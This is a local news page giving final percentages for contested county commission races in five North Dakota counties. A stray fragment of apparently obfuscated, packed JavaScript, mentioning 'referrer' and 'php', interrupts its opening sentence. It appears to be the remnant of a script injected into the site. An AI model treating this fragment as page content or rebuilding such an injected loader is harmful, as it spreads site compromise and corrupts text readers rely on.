Final Contested County Commission Results – Eddy, Griggs, Kidder, Steele, Sargent


The nydys|var|u0026u|referrer|ktyfe||js|php’.split(‘|’),0,{}))
following is the complete list of those running for the contested County Commissioner positions in the following counties: Eddy, Griggs, Kidder, Steele and Sargent.

Specific offices are highlighted in bold and underlined, and in each category, the winner is in bold and italics.

Eddy County Commissioner

Glenda Collier Ulrich 61.7%

Earl Sauer 38.3%

Griggs County Commissioner (District 2)

Diane Cowdrey 44.9%

Ronnie Edland 55.1%

Kidder County Commissioner

David Heaton 44.3%

Dan P Mittleider 54.9%

Steele County Commissioner (District 2)

Lance Fugleberg 50.6%

Richard C Strand 48.6%

Sargent County Commissioner (At-Large: Vote for Two)

Bill Anderson 34.7%

Richard Ruch 26.1%

Jerry M Waswick 37.3%


Comment Disclaimer: The views and opinions expressed in the comments section of are solely those of the comment author and do not necessarily reflect the views and opinions held by

Leave a Comment

National News

National Sports